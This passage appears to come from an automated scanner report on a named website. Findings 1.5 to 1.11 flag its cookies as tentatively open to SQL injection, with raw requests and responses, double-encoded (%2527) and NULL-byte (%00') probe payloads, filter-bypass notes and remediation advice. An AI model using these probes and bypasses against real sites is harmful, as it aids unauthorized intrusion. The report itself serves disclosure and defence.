Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7
...[SNIP]...

Response 2

HTTP/1.1 302 Found
Date: Wed, 05 Oct 2011 18:46:57 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865617; expires=Thu, 04-Oct-2012 18:46:57 GMT; path=/
Location: http://theplatform.com/search/noresults/deac691353c6d300858204d3decac5e8/
Content-Length: 0
Connection: close
Content-Type: text/html


1.5. http://theplatform.com/ [ReleaseDeliveryTime cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://theplatform.com
Path:   /

Issue detail

The ReleaseDeliveryTime cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ReleaseDeliveryTime cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ReleaseDeliveryTime cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889%2527; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:46:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865595; expires=Thu, 04-Oct-2012 18:46:35 GMT; path=/
Content-Length: 1641
Connection: close
Content-Type: text/html

<html>
<head>

<title>Error</title>

<meta http-equiv='content-type' content='text/html; charset=utf-8' />


<style type="text/css">

body {
background-color:    #ffffff;
margin:                50px;
font-family
...[SNIP]...

Request 2

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889%2527%2527; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7
...[SNIP]...

Response 2

HTTP/1.1 302 Found
Date: Wed, 05 Oct 2011 18:46:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865596; expires=Thu, 04-Oct-2012 18:46:36 GMT; path=/
Location: http://theplatform.com/search/noresults/a6cf2cb1d50de87ac9dec1cd229e7342/
Content-Length: 0
Connection: close
Content-Type: text/html


1.6. http://theplatform.com/ [ReleasePID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://theplatform.com
Path:   /

Issue detail

The ReleasePID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ReleasePID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ReleasePID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe%2527; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:46:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865592; expires=Thu, 04-Oct-2012 18:46:32 GMT; path=/
Content-Length: 1641
Connection: close
Content-Type: text/html

<html>
<head>

<title>Error</title>

<meta http-equiv='content-type' content='text/html; charset=utf-8' />


<style type="text/css">

body {
background-color:    #ffffff;
margin:                50px;
font-family
...[SNIP]...

Request 2

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe%2527%2527; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7
...[SNIP]...

Response 2

HTTP/1.1 302 Found
Date: Wed, 05 Oct 2011 18:46:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865593; expires=Thu, 04-Oct-2012 18:46:33 GMT; path=/
Location: http://theplatform.com/search/noresults/280ec738c8bd42cc793a1a4ea2ac5b11/
Content-Length: 0
Connection: close
Content-Type: text/html


1.7. http://theplatform.com/ [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://theplatform.com
Path:   /

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1%00'; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:46:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865577; expires=Thu, 04-Oct-2012 18:46:17 GMT; path=/
Content-Length: 1641
Connection: close
Content-Type: text/html

<html>
<head>

<title>Error</title>

<meta http-equiv='content-type' content='text/html; charset=utf-8' />


<style type="text/css">

body {
background-color:    #ffffff;
margin:                50px;
font-family
...[SNIP]...

Request 2

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1%00''; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7
...[SNIP]...

Response 2

HTTP/1.1 302 Found
Date: Wed, 05 Oct 2011 18:46:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865578; expires=Thu, 04-Oct-2012 18:46:18 GMT; path=/
Location: http://theplatform.com/search/noresults/961ab77bab4b2d5604804a70f6b7d777/
Content-Length: 0
Connection: close
Content-Type: text/html


1.8. http://theplatform.com/ [__utmb cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://theplatform.com
Path:   /

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451%00'

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:46:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865608; expires=Thu, 04-Oct-2012 18:46:48 GMT; path=/
Content-Length: 1641
Connection: close
Content-Type: text/html

<html>
<head>

<title>Error</title>

<meta http-equiv='content-type' content='text/html; charset=utf-8' />


<style type="text/css">

body {
background-color:    #ffffff;
margin:                50px;
font-family
...[SNIP]...

Request 2

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451%00''

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7
...[SNIP]...

Response 2

HTTP/1.1 302 Found
Date: Wed, 05 Oct 2011 18:46:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865609; expires=Thu, 04-Oct-2012 18:46:49 GMT; path=/
Location: http://theplatform.com/search/noresults/b5475a59a34972037dab9efa7ffa0729/
Content-Length: 0
Connection: close
Content-Type: text/html


1.9. http://theplatform.com/ [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://theplatform.com
Path:   /

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)%00'; exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:46:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865586; expires=Thu, 04-Oct-2012 18:46:26 GMT; path=/
Content-Length: 1641
Connection: close
Content-Type: text/html

<html>
<head>

<title>Error</title>

<meta http-equiv='content-type' content='text/html; charset=utf-8' />


<style type="text/css">

body {
background-color:    #ffffff;
margin:                50px;
font-family
...[SNIP]...

Request 2

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)%00''; exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7
...[SNIP]...

Response 2

HTTP/1.1 302 Found
Date: Wed, 05 Oct 2011 18:46:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865587; expires=Thu, 04-Oct-2012 18:46:27 GMT; path=/
Location: http://theplatform.com/search/noresults/56ead3789b557f1946006e6dc5102b8a/
Content-Length: 0
Connection: close
Content-Type: text/html


1.10. http://theplatform.com/ [exp_last_activity cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://theplatform.com
Path:   /

Issue detail

The exp_last_activity cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the exp_last_activity cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the exp_last_activity cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450%2527; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:46:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865599; expires=Thu, 04-Oct-2012 18:46:39 GMT; path=/
Content-Length: 1641
Connection: close
Content-Type: text/html

<html>
<head>

<title>Error</title>

<meta http-equiv='content-type' content='text/html; charset=utf-8' />


<style type="text/css">

body {
background-color:    #ffffff;
margin:                50px;
font-family
...[SNIP]...

Request 2

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://theplatform.com/corp/support/trc_sign_in/?target=%2Fhomepage.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450%2527%2527; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7
...[SNIP]...

Response 2

HTTP/1.1 302 Found
Date: Wed, 05 Oct 2011 18:46:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865600; expires=Thu, 04-Oct-2012 18:46:40 GMT; path=/
Location: http://theplatform.com/search/noresults/8f71647bed1357fbed35d9783d049c63/
Content-Length: 0
Connection: close
Content-Type: text/html


1.11. http://theplatform.com/ [exp_last_visit cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://theplatform.com
